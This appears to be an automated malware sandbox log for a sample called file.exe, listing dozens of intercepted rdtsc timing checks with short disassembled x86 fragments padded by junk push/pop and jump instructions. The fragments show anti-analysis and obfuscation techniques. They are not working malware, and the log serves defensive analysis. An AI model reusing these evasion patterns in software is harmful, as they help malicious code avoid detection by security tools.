Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CE4C90 second address: CE4C94 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CE4C94 second address: CE4CA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F6268DAF3C6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CF2977 second address: CF297B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CF22D4 second address: CF22D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CF22D8 second address: CF2305 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F626941E969h 0x00000007 jmp 00007F626941E95Ah 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 pop eax 0x00000012 push eax 0x00000013 pop eax 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CF2305 second address: CF2309 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CF2309 second address: CF230F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CF230F second address: CF2335 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F6268DAF3CBh 0x0000000a jmp 00007F6268DAF3CDh 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 je 00007F6268DAF3C6h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CF2335 second address: CF2339 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CF2339 second address: CF2370 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6268DAF3D5h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F6268DAF3D8h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CF2370 second address: CF2378 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push edx 0x00000007 pop edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CF5070 second address: CF5077 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D03268 second address: D03270 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D03270 second address: D0328C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F6268DAF3D7h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D09C28 second address: D09C30 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D09C30 second address: D09C64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6268DAF3D0h 0x00000009 popad 0x0000000a popad 0x0000000b push ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F6268DAF3CFh 0x00000013 jmp 00007F6268DAF3CCh 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D0A02E second address: D0A034 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D0A034 second address: D0A043 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jne 00007F6268DAF3CEh 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D0A043 second address: D0A050 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D0A050 second address: D0A06C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6268DAF3D8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D0A06C second address: D0A07C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007F626941E956h 0x0000000a jp 00007F626941E956h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D0A07C second address: D0A080 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D0A1E4 second address: D0A1EE instructions: 0x00000000 rdtsc 0x00000002 jc 00007F626941E956h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D0A1EE second address: D0A202 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jng 00007F6268DAF3C6h 0x00000009 pushad 0x0000000a popad 0x0000000b pop edx 0x0000000c jnp 00007F6268DAF3D2h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D0A202 second address: D0A222 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F626941E956h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jmp 00007F626941E960h 0x00000012 push eax 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D0A222 second address: D0A244 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F6268DAF3D9h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D0A244 second address: D0A24D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D0A534 second address: D0A53E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop eax 0x00000007 push ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D0A53E second address: D0A545 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ebx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D0F5F4 second address: D0F600 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D1BFCF second address: D1BFDB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push edx 0x00000008 push esi 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D1BFDB second address: D1BFE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D1BFE0 second address: D1BFE5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D1BFE5 second address: D1BFF1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F6268DAF3C6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D1BFF1 second address: D1C002 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F626941E956h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e push ecx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D1C002 second address: D1C00C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D1C00C second address: D1C016 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push edi 0x00000007 pop edi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D1C016 second address: D1C01E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D1C01E second address: D1C026 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D1C026 second address: D1C02C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D2FCBA second address: D2FCC3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D2FCC3 second address: D2FCC9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D2FCC9 second address: D2FCF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F626941E956h 0x0000000a je 00007F626941E956h 0x00000010 popad 0x00000011 jno 00007F626941E962h 0x00000017 push eax 0x00000018 push edx 0x00000019 push ecx 0x0000001a pop ecx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D2FCF2 second address: D2FCF6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D2FCF6 second address: D2FD13 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F626941E963h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D2FD13 second address: D2FD1C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D440EA second address: D4410A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 jp 00007F626941E956h 0x0000000d jmp 00007F626941E963h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D4410A second address: D4410E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D44276 second address: D4427F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D4427F second address: D44285 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D44285 second address: D442CD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F626941E95Ah 0x00000007 jmp 00007F626941E965h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push edi 0x0000000f jmp 00007F626941E962h 0x00000014 pop edi 0x00000015 pop edx 0x00000016 pop eax 0x00000017 pushad 0x00000018 pushad 0x00000019 jl 00007F626941E956h 0x0000001f push ecx 0x00000020 pop ecx 0x00000021 popad 0x00000022 push eax 0x00000023 push edx 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D442CD second address: D442D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D442D3 second address: D442D7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D442D7 second address: D442E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push edx 0x00000008 pop edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D44617 second address: D4461B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D4461B second address: D44621 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D44621 second address: D44640 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F626941E964h 0x00000007 pushad 0x00000008 jp 00007F626941E956h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D44ABE second address: D44AC3 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D45060 second address: D45076 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F626941E960h 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D45076 second address: D4507A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D47E13 second address: D47E28 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F626941E956h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F626941E95Bh 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D47E28 second address: D47E2D instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D47E2D second address: D47E46 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F626941E95Eh 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push esi 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D4AAB2 second address: D4AAB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D4D489 second address: D4D48F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D4D48F second address: D4D4A1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c jnp 00007F6268DAF3C6h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D4D4A1 second address: D4D4A5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D4EED5 second address: D4EF0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 jnl 00007F6268DAF3ECh 0x0000000d push eax 0x0000000e push edx 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D4EF0C second address: D4EF30 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b jp 00007F626941E969h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C6C1AE second address: C6C1B4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C6C1B4 second address: C6C1B8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B20338 second address: 4B20354 instructions: 0x00000000 rdtsc 0x00000002 mov cx, 1129h 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F6268DAF3CEh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B20354 second address: 4B20358 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B20358 second address: 4B2035E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B2035E second address: 4B2038D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F626941E95Ch 0x00000008 pop eax 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f jmp 00007F626941E95Eh 0x00000014 xchg eax, ebp 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 mov edi, 4CC5EB70h 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B2038D second address: 4B20392 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B2044A second address: 4B2044F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B2044F second address: 4B2048F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007F6268DAF3D5h 0x0000000a xor ecx, 1A28F3D6h 0x00000010 jmp 00007F6268DAF3D1h 0x00000015 popfd 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 pop ebp 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d movsx edi, ax 0x00000020 movzx esi, bx 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B2048F second address: 4B20495 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B20495 second address: 4B20499 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B20499 second address: 4B2049D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B5061F second address: 4B50623 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B50623 second address: 4B5063C instructions: 0x00000000 rdtsc 0x00000002 mov cl, dl 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov eax, 21546683h 0x0000000b popad 0x0000000c xchg eax, ebp 0x0000000d pushad 0x0000000e pushad 0x0000000f mov ecx, 77FD6D71h 0x00000014 mov bh, cl 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B5063C second address: 4B506C8 instructions: 0x00000000 rdtsc 0x00000002 mov di, EE48h 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 mov ebp, esp 0x0000000b pushad 0x0000000c pushad 0x0000000d movsx edx, cx 0x00000010 mov ebx, eax 0x00000012 popad 0x00000013 movzx ecx, dx 0x00000016 popad 0x00000017 push esi 0x00000018 pushad 0x00000019 movzx esi, dx 0x0000001c pushfd 0x0000001d jmp 00007F6268DAF3CBh 0x00000022 sbb si, 313Eh 0x00000027 jmp 00007F6268DAF3D9h 0x0000002c popfd 0x0000002d popad 0x0000002e mov dword ptr [esp], ecx 0x00000031 pushad 0x00000032 push esi 0x00000033 call 00007F6268DAF3D3h 0x00000038 pop ecx 0x00000039 pop edi 0x0000003a mov ecx, 25BDF605h 0x0000003f popad 0x00000040 xchg eax, esi 0x00000041 jmp 00007F6268DAF3D0h 0x00000046 push eax 0x00000047 jmp 00007F6268DAF3CBh 0x0000004c xchg eax, esi 0x0000004d push eax 0x0000004e push edx 0x0000004f push eax 0x00000050 push edx 0x00000051 pushad 0x00000052 popad 0x00000053 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B506C8 second address: 4B506CE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B50792 second address: 4B50817 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F6268DAF3D0h 0x00000009 or cx, 7608h 0x0000000e jmp 00007F6268DAF3CBh 0x00000013 popfd 0x00000014 pushfd 0x00000015 jmp 00007F6268DAF3D8h 0x0000001a and al, 00000068h 0x0000001d jmp 00007F6268DAF3CBh 0x00000022 popfd 0x00000023 popad 0x00000024 pop edx 0x00000025 pop eax 0x00000026 cmp dword ptr [ebp-04h], 00000000h 0x0000002a jmp 00007F6268DAF3D6h 0x0000002f mov esi, eax 0x00000031 pushad 0x00000032 mov edi, eax 0x00000034 mov ebx, eax 0x00000036 popad 0x00000037 je 00007F6268DAF443h 0x0000003d push eax 0x0000003e push edx 0x0000003f jmp 00007F6268DAF3CBh 0x00000044 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B50817 second address: 4B5084B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F626941E95Fh 0x00000009 sub cx, 11BEh 0x0000000e jmp 00007F626941E969h 0x00000013 popfd 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B5089E second address: 4B5000F instructions: 0x00000000 rdtsc 0x00000002 mov di, ax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov si, 2C1Dh 0x0000000b popad 0x0000000c pop esi 0x0000000d pushad 0x0000000e mov cl, C1h 0x00000010 pushfd 0x00000011 jmp 00007F6268DAF3CBh 0x00000016 xor eax, 77ADDE8Eh 0x0000001c jmp 00007F6268DAF3D9h 0x00000021 popfd 0x00000022 popad 0x00000023 leave 0x00000024 pushad 0x00000025 mov edi, esi 0x00000027 jmp 00007F6268DAF3D8h 0x0000002c popad 0x0000002d retn 0004h 0x00000030 nop 0x00000031 cmp eax, 00000000h 0x00000034 setne al 0x00000037 xor ebx, ebx 0x00000039 test al, 01h 0x0000003b jne 00007F6268DAF3C7h 0x0000003d xor eax, eax 0x0000003f sub esp, 08h 0x00000042 mov dword ptr [esp], 00000000h 0x00000049 mov dword ptr [esp+04h], 00000000h 0x00000051 call 00007F626CE5B6A1h 0x00000056 mov edi, edi 0x00000058 pushad 0x00000059 mov edi, eax 0x0000005b popad 0x0000005c xchg eax, ebp 0x0000005d pushad 0x0000005e pushad 0x0000005f mov ax, E3CDh 0x00000063 push eax 0x00000064 push edx 0x00000065 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B5000F second address: 4B5001E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov ch, 59h 0x00000007 popad 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B5001E second address: 4B50022 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B50022 second address: 4B50039 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F626941E963h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
